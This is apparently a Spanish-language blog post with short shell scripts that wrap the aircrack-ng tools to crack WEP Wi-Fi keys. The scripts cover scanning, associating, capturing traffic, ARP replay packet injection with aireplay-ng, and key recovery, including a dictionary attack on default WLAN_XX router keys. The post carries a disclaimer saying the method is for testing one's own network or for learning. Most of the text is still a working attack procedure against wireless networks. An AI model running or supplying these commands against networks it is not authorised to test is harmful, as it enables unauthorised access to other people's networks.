Sacar la contraseña del router wifi de tu vecino no es una práctica legal, así que NO debes utilizar estas herramientas con ese propósito, sino con el propósito de saber si tu red es segura, para aprender, y como curiosidad.
Las contraseñas WEP están desaprobadas, como mecanismo de privacidad inalámbrico, desde el año 2004. Sin embargo hoy en día todavía se siguen usando.
Para facilitarte la tarea a la hora de descifrar una contraseña WEP y no tengas que acordarte de los comandos y los parámetros, te ofrezco unos scripts (shellscript para GNU/Linux) que agilizarán el proceso. He de decir que estos scripts han sido hechos para ser usados con una tarjeta de red con chipset intel ipw2200. Desconozco si sirven para alguna más.
1 - Escanear redes.
Ejecuta el comando airodump-ng sobre el interfaz de red rtap0 que está en modo monitor.
airodump-ng rtap0
2 - Asociarte a una red.
Una vez que hayas encontrado la red de la cual quieras obtener la contraseña debes asociarte a ella para poder inyectar paquetes posteriormente.
if [ "$1" ]; then iwconfig eth1 essid $1 key 11111111111 echo OK else echo Uso: $0 NOMBRE_RED fi
3 - Guardar información de la red
Debes guardar toda la información obtenida del tráfico de la red en un fichero, para ello usamos el comando airodump-ng:
if [ "$2" ]; then airodump-ng -c $1 -b $2 -w fichero rtap0 echo OK else echo USO: $0 canal mac_del_router fi
4 - Inyectar paquetes
Para aumentar el tráfico en la red y así agilizar el proceso de obtención de la clave debemos inyectar paquetes usando aireplay-ng. Importante: cambia 00:01:02:03:04:05 por tu MAC
if [ "$1" ]; then aireplay-ng -3 -x 600 -b $1 -h 00:01:02:03:04:05 -i rtap0 eth1 else echo USO: $0 mac_del_router fi
5 - Obtener la contraseña
Una vez hayamos obtenido alrededor de 40.000 paquetes podemos obtener la contraseña con el comando aircrack-ng
if [ "$1" ]; then aircrack-ng -z $1 else echo Uso: $0 Nombre_Fichero_CAP fi
Si el nombre de la red a obtener es de la forma WLAN_XX (donde XX son 2 cifras hexadecimales) y la contraseña del router es la que venía por defecto. El descifrado de la clave se agiliza muchísimo. Usando la herramienta "wlan_decrpyter" podemos generar un diccionario de claves que luego usaremos como parámetro de entrada del programa aircrack-ng:
if [ "$2" ]; then aircrack-ng -w $1 $2 else echo Uso: $0 fich_diccionario fich_cap fiLos scripts están disponibles aquí: Descargar
No hay comentarios:
Publicar un comentario